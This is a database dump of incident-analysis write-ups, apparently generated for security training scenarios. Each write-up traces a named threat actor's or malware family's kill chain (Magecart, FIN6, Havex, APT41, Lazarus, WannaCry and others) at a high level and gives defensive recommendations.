(168, 32, 455, 1, 'Post-Compromise Analysis: Third-Party Library Breach', '### Overview\nThe initial alert identified a compromise via a third-party library, suggesting a supply chain attack. This indicates a breach at the level of software dependencies, commonly exploited by Magecart groups.\n\n### Technical Details\n- **Vulnerable Library**: The breach originated from a popular JavaScript library commonly used for e-commerce platforms.\n- **Attack Vector**: The attackers injected malicious code into the library before distribution, affecting all sites utilizing the compromised version.\n\n### Recommendations\n- **Immediate Actions**: Remove the compromised library version from your systems and monitor for any unusual activity.\n- **Long-term Strategy**: Implement a robust dependency tracking system and regularly audit third-party code for vulnerabilities.\n\n### Next Steps\nPrepare for potential **Code Injection** activities, as malicious scripts are likely to be executed on compromised websites.', '2026-01-05 00:07:01'),
(169, 32, 456, 2, 'Execution of Obfuscated JavaScript: Code Injection Analysis', '### Overview\nFollowing the supply chain compromise, obfuscated JavaScript has been detected executing within the affected websites. This is a classic Magecart tactic aimed at capturing sensitive user data.\n\n### Technical Details\n- **Obfuscation Method**: The JavaScript code uses advanced obfuscation techniques to avoid detection by standard security tools.\n- **Functionality**: The script is designed to skim credit card information entered on checkout pages and store it temporarily before exfiltration.\n\n### Recommendations\n- **Immediate Actions**: Deploy advanced threat detection tools capable of de-obfuscating and analyzing JavaScript code in real-time.\n- **Mitigation Strategy**: Harden your Content Security Policy (CSP) to restrict unauthorized script execution.\n\n### Next Steps\nPrepare for **Data Exfiltration** as the attackers will attempt to transfer skimmed data to their drop servers. Monitor outgoing network traffic for anomalies.', '2026-01-05 00:07:01'),
(170, 32, 457, 3, NULL, NULL, '2026-01-05 00:07:01'),
(171, 33, 458, 1, 'Initial Access Analysis: Vendor Login Anomaly', '## Investigation Summary\nThe suspicious vendor login detected indicates potential unauthorized access to the retail network. The login was traced back to an IP address known for previous cyber activities linked to the FIN6 group.\n\n## Incident Details\n- **Date & Time**: [Timestamp]\n- **Source IP**: [Suspicious IP Address]\n- **Affected System**: Vendor portal\n\n## Recommendations\n- Immediately review access logs for the vendor portal.\n- Implement multi-factor authentication for vendor accounts.\n- Conduct a security audit of all vendor credentials.\n\n## Next Steps\nPrepare for potential escalation of activities, such as malware deployment, given historical patterns of FIN6 operations.', '2026-01-05 00:10:13'),
(172, 33, 459, 2, 'Trinity Malware Deployment on POS Systems', '## Incident Overview\nFollowing the initial access, Trinity malware has been deployed across multiple POS systems. This malware is engineered to scrape sensitive credit card data.\n\n## Key Indicators\n- **Malware Signature**: Trinity (v2.5)\n- **Affected Systems**: POS terminals at multiple retail locations\n- **Detection Method**: Anomalous network traffic and unusual process activity\n\n## Containment Measures\n- Isolate affected POS systems from the network.\n- Begin forensic imaging of compromised systems for deeper analysis.\n\n## Next Steps\nFocus on understanding the method of persistence that the attackers may employ to maintain access within the network.', '2026-01-05 00:10:13'),
(173, 33, 460, 3, 'Persistence Mechanisms: Ensuring Long-term Access', '## Persistence Tactics\nFollowing the Trinity malware deployment, evidence suggests the attackers are establishing persistence mechanisms to secure long-term access.\n\n## Observations\n- **Backdoor Installations**: Detected across several POS systems.\n- **Registry Alterations**: Unusual changes consistent with persistence techniques.\n- **Scheduled Tasks**: Newly created tasks that execute malicious scripts.\n\n## Recommendations\n- Perform a comprehensive review of system startup entries and scheduled tasks.\n- Remove unauthorized backdoors and restore registry settings to default.\n\n## Next Steps\nMonitor for lateral movement attempts as attackers may seek to expand their foothold within the network.', '2026-01-05 00:10:13'),
(174, 33, 461, 4, 'Lateral Movement Detected: Expanding Attack Surface', '## Movement Patterns\nUnauthorized lateral movement has been detected, suggesting an expansion of the attack surface by FIN6 operatives.\n\n## Indicators of Compromise\n- **Credential Harvesting**: Attempts to access additional systems using compromised credentials.\n- **Network Scanning**: Scans targeting lateral movement pathways.\n- **Unauthorized Access**: Attempts to access HR and financial systems.\n\n## Containment Strategies\n- Implement network segmentation to restrict unauthorized access.\n- Reset credentials for all potentially compromised accounts.\n\n## Next Steps\nPrepare for potential data exfiltration attempts, focusing particularly on sensitive financial data.', '2026-01-05 00:10:13'),
(175, 33, 462, 5, NULL, NULL, '2026-01-05 00:10:13'),
(176, 34, 463, 1, 'Execution of Embedded VBScript Backdoor Uncovered', '### Overview\nFollowing the initial access achieved through a weaponized Word document, further investigation has revealed the execution of an embedded VBScript backdoor. This backdoor is activated as soon as the document is opened by the target, exploiting vulnerabilities in VBScript execution.\n\n### Technical Details\nThe VBScript is designed to run in the background, establishing persistent access to the compromised system. It leverages Windows Management Instrumentation (WMI) to execute commands and maintain a foothold.\n\n### Indicators of Compromise (IOCs)\n- Unusual network traffic originating from the affected host.\n- Creation of scheduled tasks or registry entries linked to VBScript execution.\n\n### Recommendations\n- Implement strict email filtering to block potentially malicious attachments.\n- Educate personnel on recognizing phishing attempts and suspicious document behaviors.', '2026-01-05 02:59:34'),
(177, 34, 464, 2, 'Data Exfiltration via Encrypted Channels Identified', '### Overview\nThe previously identified VBScript backdoor has facilitated data exfiltration activities. Our analysis indicates that sensitive information is being transmitted through encrypted channels, making detection more challenging.\n\n### Technical Details\nThe data exfiltration process involves packaging sensitive files into encrypted archives, which are then transmitted to remote servers controlled by the threat actors. The use of HTTPS and other encrypted protocols obscures the content from standard monitoring tools.\n\n### Indicators of Compromise (IOCs)\n- Outbound connections to unfamiliar IP addresses using HTTPS.\n- Unusual data transfer volumes at odd hours.\n\n### Recommendations\n- Deploy network anomaly detection systems to identify unusual patterns in encrypted traffic.\n- Conduct regular audits of data access and transfer logs to spot unauthorized activities.\n- Strengthen endpoint security measures to detect and block unauthorized encryption tools.', '2026-01-05 02:59:34'),
(178, 34, 465, 3, NULL, NULL, '2026-01-05 02:59:34'),
(179, 35, 466, 1, 'Insight into Initial Access: Trojanized Software Update', '### Contextual Analysis\n\nFollowing the detection of the **trojanized software update**, our investigation reveals that the compromise occurred through a sophisticated supply chain attack. The malicious update originates from a compromised vendor responsible for developing ICS software used widely in the energy sector.\n\n### Key Observations:\n- **Vendor Breach**: Initial analysis suggests that the vendor\'s software distribution infrastructure was breached approximately 3 months ago.\n- **Malware Characteristics**: The trojanized update includes a payload designed to install a Remote Access Trojan (RAT) known as \'Havex\'.\n\n### Next Steps:\n- **Monitor for RAT Deployment**: Be vigilant for signs of \'Havex\' RAT installation and execution across affected systems.\n- **Vendor Communication**: Engage with the software vendor to confirm breach details and remediation plans.', '2026-01-05 03:02:42'),
(180, 35, 467, 2, 'Execution of \'Havex\' RAT: Command and Control Infrastructure', '### Incident Overview\n\nPost-deployment of the **\'Havex\' RAT**, communication with its command and control (C2) servers has been observed. This RAT allows adversaries remote control over infected machines, enabling further reconnaissance and exploitation.\n\n### Key Indicators:\n- **C2 Domains**: Infected systems connect to multiple C2 domains, some of which have been newly registered and others linked to known threat actor infrastructure.\n- **RAT Capabilities**: The \'Havex\' RAT is capable of gathering system information, executing commands, and facilitating lateral movement.\n\n### Actionable Intelligence:\n- **Registry Monitoring**: Prepare to detect persistence mechanisms, particularly involving registry modifications.\n- **Network Segmentation**: Implement stricter network segmentation to limit RAT communication and lateral movement.', '2026-01-05 03:02:42'),
(181, 35, 468, 3, 'Persistence Mechanism: Registry Modifications Detected', '### Persistence Analysis\n\nThe adversary has employed **registry modifications** to ensure the \'Havex\' RAT remains active. This persistence mechanism involves altering system configurations to execute the RAT upon system startup.\n\n### Technical Details:\n- **Registry Keys Altered**: Modifications have been observed in key areas responsible for startup execution, specifically within `HKEY_LOCAL_MACHINE` and `HKEY_CURRENT_USER` paths.\n- **Stealth Tactics**: The changes are subtle, designed to evade typical detection methods by mimicking legitimate entries.\n\n### Recommendations:\n- **Conduct Integrity Checks**: Regularly verify registry integrity against known good baselines.\n- **Prepare for Lateral Movement**: Anticipate network reconnaissance activities, specifically anomalies in SMB traffic.', '2026-01-05 03:02:42'),
(182, 35, 469, 4, 'Lateral Movement: SMB Traffic Anomaly and Network Reconnaissance', '### Network Activity Review\n\nUnusual **SMB traffic patterns** indicate ongoing **lateral movement** and reconnaissance activities. This phase involves mapping the network to identify high-value targets for data exfiltration.\n\n### Traffic Analysis:\n- **Suspicious Connections**: Multiple SMB connections initiated from compromised hosts targeting administrative shares.\n- **Reconnaissance Tools**: Use of known tools such as `PsExec` and `WMIC` to explore network topology and access additional systems.\n\n### Defensive Measures:\n- **Anomaly Detection**: Enhance monitoring for unusual SMB traffic and lateral movement activities.\n- **Data Exfiltration Monitoring**: Prepare to intercept unauthorized data transfers, particularly those involving sensitive operational data.', '2026-01-05 03:02:42'),
(183, 35, 470, 5, NULL, NULL, '2026-01-05 03:02:42'),
(184, 36, 471, 1, 'Unsigned Software Update Detected', '## Overview\nFollowing the detection of suspicious Wi-Fi network activity, a potential threat has been identified involving an unsigned software update. This update appears to be disguised as a legitimate system or application update targeting luxury hotel executives.\n\n## Details\n- **Type of Threat:** Tapaoux malware\n- **Method of Delivery:** Wi-Fi network masquerading as a trusted access point\n- **Target:** Executives of luxury hotels\n\n## Recommendations\n- **Network Monitoring:** Enhance monitoring of Wi-Fi networks for unauthorized access points.\n- **Software Verification:** Ensure all updates are signed and verified before installation.\n\n## Next Steps\nInvestigate the execution phase to determine if the malware has been successfully deployed onto target systems.', '2026-01-05 03:04:49'),
(185, 36, 472, 2, 'Tapaoux Malware Persistence Mechanism', '## Overview\nAfter identifying the unsigned software update, further investigation reveals the Tapaoux malware has established persistence mechanisms in the target systems.\n\n## Details\n- **Persistence Techniques:** The malware modifies startup scripts and registry keys to ensure it executes upon system reboot.\n- **Stealth Tactics:** It employs obfuscation techniques to evade detection by traditional antivirus solutions.\n\n## Recommendations\n- **System Hardening:** Regularly review and limit startup scripts and registry changes.\n- **Advanced Threat Protection:** Deploy solutions capable of detecting obfuscated code.\n\n## Next Steps\nExamine potential unauthorized credential access attempts as the malware may be moving laterally within the network.', '2026-01-05 03:04:49'),
(186, 36, 473, 3, 'Unauthorized Credential Access Attempt', '## Overview\nFollowing the establishment of persistence by Tapaoux malware, there have been attempts to access credentials within the compromised systems.\n\n## Details\n- **Credential Harvesting:** The malware attempts to extract cached credentials from browsers and network authentication processes.\n- **Potential Targets:** Emails, financial applications, and internal corporate networks.\n\n## Recommendations\n- **Credential Management:** Enforce multi-factor authentication and regular credential updates.\n- **Incident Response:** Conduct a thorough review of access logs to identify any anomalies.\n\n## Next Steps\nMonitor for potential exfiltration of sensitive data, which could indicate further stages of the attack.', '2026-01-05 03:04:49'),
(187, 36, 474, 4, 'Exfiltration of Sensitive Data', '## Overview\nAs anticipated, there is evidence of data exfiltration following the unauthorized credential access attempts. Sensitive information has been transferred out of the network.\n\n## Details\n- **Data Types:** Financial records, personal information of executives, and proprietary business data.\n- **Exfiltration Channels:** Utilization of encrypted channels and cloud services to circumvent detection.\n\n## Recommendations\n- **Data Loss Prevention:** Implement solutions to monitor and block unauthorized data transfers.\n- **Forensic Analysis:** Conduct a comprehensive forensic analysis to understand the scale and impact of the data breach.\n\n## Next Steps\nInitiate containment procedures to prevent further data loss and begin remediation efforts to secure the network.', '2026-01-05 03:04:49'),
(188, 36, 475, 5, NULL, NULL, '2026-01-05 03:04:49'),
(189, 37, 476, 1, 'Analysis of Malicious Payload Execution via RoyalRoad Exploit', '### Overview\nFollowing the detection of a suspicious email containing a malicious RTF attachment, further investigation reveals the exploitation of the RoyalRoad vulnerability. The RoyalRoad exploit has been utilized to execute a malicious payload on the target system.\n\n### Technical Details\n- **Exploit Method**: The RTF attachment leverages a known vulnerability in Microsoft Office to execute arbitrary code.\n- **Payload**: The payload includes scripts that prepare the environment for further exploitation.\n\n### Implications\nThe successful execution of this payload indicates a sophisticated attack vector likely aiming to establish deeper system access.\n\n### Next Steps\n- Monitor for any signs of persistence mechanisms being established.\n- Conduct a detailed forensic analysis of the affected systems.', '2026-01-05 03:08:29'),
(190, 37, 477, 2, 'Persistence Mechanism via Aria-body Backdoor', '### Overview\nFollowing the execution of the RoyalRoad exploit, analysis identifies the installation of the Aria-body backdoor. This backdoor is designed to maintain persistent access to the compromised systems.\n\n### Technical Details\n- **Backdoor Functionality**: The Aria-body backdoor allows the attacker to maintain a foothold in the network and execute commands remotely.\n- **Persistence Method**: The backdoor is embedded within legitimate system processes, making detection challenging.\n\n### Implications\nEstablishing persistence is a critical step for the attacker to facilitate further actions, including lateral movement.\n\n### Recommendations\n- Implement enhanced monitoring for unusual network activities.\n- Initiate a comprehensive review of system logs to identify any signs of lateral movement.', '2026-01-05 03:08:29'),
(191, 37, 478, 3, 'Lateral Movement Analysis Across Internal Network', '### Overview\nInvestigation into the Aria-body backdoor has unveiled signs of lateral movement within the internal network. The attacker appears to be exploring the network to identify valuable targets.\n\n### Technical Details\n- **Movement Techniques**: The attacker utilizes legitimate credentials and tools to access other systems within the network.\n- **Targets Identified**: Several high-value systems have been accessed, indicating a targeted approach.\n\n### Implications\nThe lateral movement poses a significant risk as it suggests the attacker is positioning themselves for data exfiltration.\n\n### Countermeasures\n- Conduct a thorough audit of user accounts and permissions.\n- Isolate affected systems to prevent further unauthorized access.', '2026-01-05 03:08:29'),
(192, 37, 479, 4, 'Data Exfiltration to Command and Control Server', '### Overview\nSubsequent to the lateral movement activities, evidence of data exfiltration has been detected. Data is being transmitted to an external Command and Control (C2) server.\n\n### Technical Details\n- **Exfiltration Method**: The data is being exfiltrated over encrypted channels to evade detection.\n- **Type of Data**: Preliminary analysis suggests sensitive organizational data is being targeted.\n\n### Implications\nData exfiltration represents a critical breach of security and potential disclosure of sensitive information.\n\n### Immediate Actions\n- Block known C2 server IPs and domains.\n- Initiate an incident response protocol to contain and mitigate the breach.\n- Notify relevant stakeholders and begin a post-incident analysis to prevent future occurrences.', '2026-01-05 03:08:29'),
(193, 37, 480, 5, NULL, NULL, '2026-01-05 03:08:29'),
(194, 39, 481, 1, 'Unauthorized CMS Article Publication: Initial Access and Indicators', '### Overview\nUpon detecting a suspicious login, further analysis revealed unauthorized activity within the CMS. This activity is characterized by the creation and publication of articles containing misleading information.\n\n### Details\n- **Entry Point**: Exploitation of CMS vulnerabilities allowing remote access.\n- **Indicators of Compromise (IoCs)**: Abnormal login times, unfamiliar IP addresses, and modifications to content templates.\n\n### Recommendations\n- Immediate review and audit of CMS access logs.\n- Implementation of multi-factor authentication for CMS access.\n- Increase monitoring of content changes and publication activities.', '2026-01-05 03:22:52'),
(195, 39, 482, 2, 'Backdoor Account Creation: Ensuring Persistence', '### Overview\nFollowing the unauthorized publication of articles, further investigation uncovered the creation of backdoor accounts within the CMS to maintain persistent access.\n\n### Details\n- **Objective**: Establish long-term access to manipulate media content.\n- **Method**: Accounts created using compromised credentials or exploiting CMS administrative functions.\n\n### Indicators\n- New accounts with administrative privileges created without authorization.\n- Unusual account activity patterns.\n\n### Recommendations\n- Conduct a thorough review of all CMS accounts and privileges.\n- Enforce stricter user access controls and regular audits.', '2026-01-05 03:22:52'),
(196, 39, 483, 3, 'Social Media Amplification Detected: Expanding Influence', '### Overview\nWith the establishment of persistence via backdoor accounts, the operation has moved to social media platforms to amplify misinformation.\n\n### Details\n- **Tactics**: Use of bot networks and sockpuppet accounts to spread content.\n- **Platforms Targeted**: Prominent social media platforms where misinformation can quickly gain traction.\n\n### Indicators\n- Spike in social media activity related to the published misinformation.\n- Rapid increase in shares and likes from newly created or suspicious accounts.\n\n### Recommendations\n- Collaborate with social media platforms to identify and suspend malicious accounts.\n- Deploy AI-based tools to detect and mitigate bot-driven amplification.', '2026-01-05 03:22:52'),
(197, 39, 484, 4, 'Data Exfiltration Attempt Detected: Protecting Sensitive Information', '### Overview\nFollowing the amplification of misinformation, attempts have been made to exfiltrate sensitive data, potentially to leverage for further influence operations or blackmail.\n\n### Details\n- **Objective**: Extract sensitive data from compromised systems.\n- **Methods**: Use of encrypted channels and covert data transfer techniques.\n\n### Indicators\n- Unusual outbound data traffic patterns detected.\n- Use of unapproved encryption tools and protocols.\n\n### Recommendations\n- Immediate lockdown of affected systems to prevent further data loss.\n- Conduct a comprehensive forensic analysis to understand the scope of the breach.\n- Enhance data loss prevention mechanisms and user training on data security.', '2026-01-05 03:22:52'),
(198, 39, 485, 5, NULL, NULL, '2026-01-05 03:22:52'),
(199, 40, 486, 1, 'Compromised Supplier Network: Initial Access Analysis', '### Background\n\nFollowing the initial alert of a **Supply Chain Compromise**, intelligence indicates that APT41 has infiltrated a key supplier network within the gaming industry. This breach was achieved through the exploitation of a vulnerable third-party software component.\n\n### Implications\n\n- **Potential Threat**: The compromised supplier can act as a distribution point for malicious payloads like ShadowPad.\n- **Scope of Access**: Initial entry points can provide adversaries with broad access to the target\'s supply chain, making subsequent attacks more stealthy and impactful.\n\n### Recommendations\n\n- **Immediate Action**: Initiate a full review of all supplier network access points and enhance monitoring for abnormal activity.\n- **Preventive Measures**: Strengthen supplier security standards and conduct regular security audits.', '2026-01-05 03:26:48'),
(200, 40, 487, 2, 'Code Injection Detection in Build Environment', '### Overview\n\nFollowing the **Code Injection** alert, it has been detected that APT41 executed malicious code within the build environment of a key gaming application.\n\n### Details of the Attack\n\n- **Vector**: The adversary leveraged the compromised supplier credentials to inject malicious scripts into the build server.\n- **Target**: This code aims to facilitate the deployment of ShadowPad, enabling further infiltration.\n\n### Impact\n\n- **Integrity Risk**: Code integrity is compromised, potentially affecting all downstream applications.\n- **Propagation**: The injected code can propagate malicious payloads to end-user devices.\n\n### Mitigation Steps\n\n- **Immediate Scrutiny**: Conduct a thorough audit of the build environment for unauthorized changes.\n- **Verification**: Validate integrity of application updates before deployment.', '2026-01-05 03:26:48'),
(201, 40, 488, 3, 'ShadowPad Backdoor Installation and Persistence', '### Situation Update\n\nPost the execution phase, APT41 has successfully established persistence through the installation of the **ShadowPad backdoor**.\n\n### Mechanism of Persistence\n\n- **Backdoor Features**: ShadowPad is known for its modular architecture, allowing dynamic loading of plugins for various malicious functions.\n- **Stealth Techniques**: Utilizes encrypted communication and masquerades as legitimate software processes.\n\n### Strategic Implications\n\n- **Long-Term Access**: Persistent access enables ongoing espionage and potential sabotage.\n- **Network Vulnerability**: Ongoing risk of lateral movement within the network.\n\n### Defensive Measures\n\n- **Enhanced Monitoring**: Deploy behavioral analytics to detect abnormal patterns indicative of backdoor activity.\n- **System Hardening**: Apply security patches and restrict administrative privileges.', '2026-01-05 03:26:48'),
(202, 40, 489, 4, 'Credential Dumping and Lateral Movement', '### Current Threat Landscape\n\nAs the operation progresses, APT41 has initiated **Lateral Movement** across the player networks by exploiting dumped credentials.\n\n### Attack Dynamics\n\n- **Credential Access**: Utilizing stolen credentials, adversaries gain access to additional systems within the network.\n- **Movement Strategy**: Focused on reaching high-value targets and exfiltrating sensitive data.\n\n### Consequences\n\n- **Increased Exposure**: Compromised credentials lead to expanded access and control over network resources.\n- **Data Breach Risk**: Heightened risk of sensitive player data being accessed and exfiltrated.\n\n### Countermeasures\n\n- **Credential Hygiene**: Enforce password complexity and regular changes.\n- **Access Controls**: Implement multi-factor authentication and continuous monitoring of user activities.', '2026-01-05 03:26:48'),
(203, 40, 490, 5, NULL, NULL, '2026-01-05 03:26:48'),
(204, 41, 491, 1, 'Follow-up on Suspicious Email Attachment', '## Overview\nUpon detection of a suspicious email attachment, further analysis revealed that the email originated from a compromised server known to be associated with the Lazarus Group. This server previously engaged in spear-phishing campaigns targeting defense contractors.\n\n## Key Findings\n- **Sender Information**: The email appeared to be sent from a legitimate contact within the organization, suggesting email spoofing techniques were employed.\n- **Attachment Details**: The attachment was a macro-enabled Excel document designed to execute a malicious payload upon opening.\n\n## Recommendations\n- **Immediate Action**: Instruct recipients to delete the email without opening the attachment.\n- **Preventive Measures**: Enhance email gateway security to filter out similar threats.', '2026-01-05 04:01:18'),
(205, 41, 492, 2, 'DTrack Payload Execution Analysis', '## Overview\nThe execution of the DTrack malware payload marks a significant escalation in the attack, indicating a shift from reconnaissance to active exploitation.\n\n## Key Findings\n- **Payload Behavior**: DTrack is known for its ability to perform file operations, execute commands, and communicate with command and control (C2) servers.\n- **C2 Communication**: Encrypted traffic was detected heading to known Lazarus Group-controlled IP addresses.\n\n## Recommendations\n- **Immediate Action**: Quarantine affected systems to prevent further spread.\n- **Forensic Analysis**: Conduct a detailed forensic analysis of infected machines to understand the extent of compromise.', '2026-01-05 04:01:18'),
(206, 41, 493, 3, 'Persistence Mechanism - DLL Hijacking', '## Overview\nThe attackers are leveraging DLL hijacking to maintain persistence on compromised systems, a technique commonly used by the Lazarus Group to ensure their presence remains undetected.\n\n## Key Findings\n- **DLL Injection**: Malicious DLLs are injected into commonly used applications, allowing them to execute under the guise of legitimate processes.\n- **Registry Modifications**: Changes in registry keys have been detected, redirecting legitimate application paths to malicious DLLs.\n\n## Recommendations\n- **Immediate Action**: Review and restore altered registry keys to their original state.\n- **Monitoring**: Implement enhanced monitoring of DLL loads across critical systems.', '2026-01-05 04:01:18'),
(207, 41, 494, 4, 'Lateral Movement via Pass-the-Hash', '## Overview\nThe attack has progressed to lateral movement within the network using Pass-the-Hash techniques, indicating a high level of sophistication and access.\n\n## Key Findings\n- **Credential Abuse**: Compromised credentials were used to authenticate across multiple systems without the need for password cracking.\n- **Targeted Systems**: High-value targets such as servers containing sensitive defense schematics have been identified as primary targets.\n\n## Recommendations\n- **Immediate Action**: Invalidate all compromised credentials and enforce password resets.\n- **Network Segmentation**: Implement network segmentation to limit lateral movement capabilities.', '2026-01-05 04:01:18'),
(208, 41, 495, 5, NULL, NULL, '2026-01-05 04:01:18'),
(209, 42, 496, 1, 'Analysis of Initial Access via Suspicious Domain', '### Context\nFollowing the detection of suspicious domain access, further investigation reveals that the domains in question are linked to a known CopyKittens infrastructure. These domains have been associated with phishing campaigns targeting government entities.\n\n### Findings\n- **Domain Characteristics**: The domains exhibit patterns typical of CopyKittens, such as misspelled names of legitimate organizations.\n- **Vector Analysis**: Initial access is likely achieved through spear-phishing emails containing malicious links or attachments.\n\n### Recommendations\n- Implement enhanced email filtering rules to detect and block phishing attempts.\n- Conduct employee training on recognizing phishing emails.', '2026-01-05 04:03:11'),
(210, 42, 497, 2, 'Matryoshka RAT Execution and Behavioral Indicators', '### Context\nAfter the execution of the Matryoshka RAT, telemetry data indicates the deployment of the RAT on compromised systems.\n\n### Findings\n- **Execution Patterns**: The RAT is executed using script-based loaders, often leveraging PowerShell or JavaScript.\n- **Persistence Mechanisms**: Scheduled tasks and registry modifications have been identified as methods to ensure persistence.\n\n### Recommendations\n- Conduct system-wide scans for registry anomalies and unauthorized scheduled tasks.\n- Implement application whitelisting to prevent the execution of unauthorized scripts.', '2026-01-05 04:03:13'),
(211, 42, 498, 3, 'DNS Tunneling Activity and Persistence Tactics', '### Context\nThe identification of DNS tunneling activity signifies an attempt by the attackers to maintain a covert communication channel with the compromised systems.\n\n### Findings\n- **Tunneling Details**: Encoded DNS queries and responses are used to bypass traditional network monitoring.\n- **Infrastructure**: Analysis shows multiple subdomains dynamically resolving to various IP addresses, indicating a sophisticated command and control (C2) setup.\n\n### Recommendations\n- Deploy DNS monitoring solutions to identify and block tunneling activities.\n- Implement strict outbound DNS policies to prevent unauthorized queries.', '2026-01-05 04:03:13'),
(212, 42, 499, 4, 'Lateral Movement Indicators and Network Traffic Analysis', '### Context\nUnusual network traffic patterns suggest lateral movement within the network as attackers attempt to access sensitive systems.\n\n### Findings\n- **Traffic Anomalies**: High-volume data transfers and unusual port activity have been observed.\n- **Compromised Credentials**: Evidence suggests the use of harvested credentials to access additional systems.\n\n### Recommendations\n- Enhance network segmentation to limit lateral movement potential.\n- Conduct a thorough audit of user accounts and implement multi-factor authentication (MFA).', '2026-01-05 04:03:13'),
(213, 42, 500, 5, NULL, NULL, '2026-01-05 04:03:13'),
(214, 43, 501, 1, 'Profile Analysis of Unverified Facebook Account', '### Overview\nThe suspicious Facebook profile involved in the initial alert appears to have been created recently, lacking personal details and typical user activity. This is indicative of a potential fake persona used for social engineering.\n\n### Details\n- **Profile Name:** John Doe\n- **Creation Date:** 2 weeks ago\n- **Mutual Connections:** 0\n- **Activity:** Minimal posts, all generic\n\n### Analysis\nThis profile likely serves as a vector for social engineering, aimed at establishing trust with targets within aerospace firms. Recommend monitoring for further interactions and cross-referencing with other suspicious profiles.', '2026-01-06 01:24:23'),
(215, 43, 502, 2, 'Phishing Attempt via Direct Message', '### Overview\nA phishing attempt was identified following the interaction with the suspicious Facebook profile. An employee received a direct message containing a malicious link, masquerading as an industry-related article.\n\n### Details\n- **Sender:** Unverified Facebook Profile\n- **Message Content:** \'Check out this article on latest aerospace innovations\' with a shortened link.\n- **Intended Target:** Senior Engineer in R&D\n\n### Recommendations\n- **Immediate Action:** Block sender and delete message.\n- **Awareness Training:** Reinforce phishing awareness among staff, emphasizing caution with unsolicited messages.', '2026-01-06 01:24:23'),
(216, 43, 503, 3, 'Detection of \'Gholee\' Malware Execution', '### Overview\nThe execution of the \'Gholee\' malware was detected on a compromised system within the aerospace firm\'s network. The malware was likely deployed following the successful phishing attempt.\n\n### Details\n- **Affected System:** Workstation of Senior Engineer\n- **Malware Characteristics:** Known for data harvesting and creating backdoors\n- **Detection Method:** Anomaly detection via endpoint security solution\n\n### Recommendations\n- **Containment:** Isolate affected systems immediately.\n- **Forensic Analysis:** Conduct a detailed analysis to understand entry points and potential data affected.', '2026-01-06 01:24:23'),
(217, 43, 504, 4, 'Persistence Mechanisms Established by \'Gholee\'', '### Overview\nFurther analysis revealed that \'Gholee\' malware has established persistence mechanisms, ensuring its survival through system reboots and security updates.\n\n### Details\n- **Persistence Techniques:** \n  - Registry key modifications\n  - Scheduled tasks creation\n  - DLL injection into legitimate processes\n\n### Countermeasures\n- **Immediate Actions:** Remove persistence mechanisms by restoring registry keys and disabling scheduled tasks.\n- **Monitoring:** Enhance system logging to detect future persistence attempts.', '2026-01-06 01:24:23'),
(218, 43, 505, 5, 'Lateral Movement Across Network', '### Overview\nFollowing the establishment of persistence, lateral movement was detected across the network, likely aimed at accessing sensitive data and escalating privileges.\n\n### Details\n- **Techniques Used:**\n  - Pass-the-Hash\n  - Remote Desktop Protocol exploitation\n- **Affected Systems:** Multiple workstations and servers in the R&D department\n\n### Recommendations\n- **Network Segmentation:** Implement stricter segmentation to limit lateral movement.\n- **Credential Management:** Enforce strong, unique passwords and regular changes.\n- **Incident Response:** Conduct a full network sweep to identify and neutralize further threats.', '2026-01-06 01:24:23'),
(219, 43, 506, 6, NULL, NULL, '2026-01-06 01:24:23'),
(220, 44, 507, 1, 'Analysis of Malicious Code Execution', '## Context\nAfter the initial breach detected via EternalBlue, the adversary has executed malicious code on the compromised system. This report delves into the observed remote code execution (RCE) activities.\n\n## Findings\n- **Payload Analyzed**: The executed payload is identified as a variant of the WannaCry ransomware, designed to encrypt files on the infected machines.\n- **Execution Method**: The payload is executed using the exploitation of the SMBv1 vulnerability, allowing for unauthenticated remote code execution.\n- **Immediate Actions**: Mitigation strategies should include disabling SMBv1 and ensuring robust network segmentation to limit the damage of any further RCE attempts.', '2026-01-06 01:34:24'),
(221, 44, 508, 2, 'Persistence Mechanisms in Place', '## Overview\nFollowing the execution of malicious code, the ransomware has established persistence to survive system reboots and maintain control over the infected systems.\n\n## Details\n- **Techniques Used**: The ransomware modifies registry keys and schedules tasks to trigger on startup, ensuring its presence on the system.\n- **Potential Countermeasures**: Immediate actions include reviewing and cleaning registry keys and scheduled tasks, and implementing endpoint detection and response (EDR) solutions to monitor for persistence attempts.', '2026-01-06 01:34:24'),
(222, 44, 509, 3, 'SMB Propagation Analysis', '## Introduction\nThe ransomware is now actively propagating through the network using SMB protocol vulnerabilities. This report outlines the observed lateral movement patterns.\n\n## Observations\n- **Propagation Method**: Utilizes the EternalBlue exploit to spread to other vulnerable machines within the network.\n- **Network Mapping**: The ransomware scans the network for other vulnerable hosts, exponentially increasing its reach.\n- **Recommendations**: Immediate patching of all systems against SMBv1 vulnerabilities and isolation of affected subnets are critical to contain the spread.', '2026-01-06 01:34:24'),
(223, 44, 510, 4, 'Kill-Switch Domain Investigation', '## Summary\nA potential kill-switch domain has been identified, which could deactivate the ransomware if successfully queried.\n\n## Investigation\n- **Domain Analysis**: The domain has been hardcoded into the malware as a potential stop mechanism.\n- **Actionable Steps**: Conduct DNS sinkholing experiments to assess the feasibility of activating the kill-switch. Consider collaborating with global ISPs for widespread DNS monitoring.', '2026-01-06 01:34:24'),
(224, 44, 511, 5, 'Encryption Logic Breakdown', '## Overview\nThe ransomware has begun encrypting files on compromised systems. This report provides an analysis of its encryption logic.\n\n## Technical Details\n- **Encryption Algorithm**: Utilizes a combination of RSA and AES to encrypt files, ensuring robustness and difficulty in decryption without the private key.\n- **File Types Targeted**: Focuses on commonly used document and multimedia file formats.\n- **Countermeasures**: Regular backups and data recovery plans are essential. Evaluate the feasibility of deploying decryption tools if available.', '2026-01-06 01:34:24'),
(225, 44, 512, 6, 'Data Exfiltration Attempt Analysis', '## Context\nAs the ransomware encrypts data, it is also attempting to exfiltrate sensitive information from the compromised systems.\n\n## Key Insights\n- **Exfiltration Channels**: Observed usage of non-standard ports and encrypted protocols for data exfiltration attempts.\n- **Data Types at Risk**: Includes personally identifiable information (PII) and corporate intellectual property.\n- **Defense Strategies**: Immediate network traffic analysis and blocking suspicious outbound connections can mitigate data loss. Implement data loss prevention (DLP) solutions to monitor sensitive data movement.', '2026-01-06 01:34:24'),
(226, 44, 513, 7, 'Ransom Note Deployment and Impact', '## Summary\nThe deployment of ransom notes signifies the completion of the ransomware\'s encryption cycle and the demand for payment.\n\n## Insights\n- **Demand Details**: The ransom note typically demands payment in cryptocurrency, providing instructions for victims.\n- **Psychological Impact**: The presence of the ransom note induces urgency and panic, often leading to hasty decision-making.\n- **Recommendations**: Encourage organizations to have a clear incident response plan and avoid paying the ransom. Leverage law enforcement and cybersecurity partnerships for support.', '2026-01-06 01:34:24'),
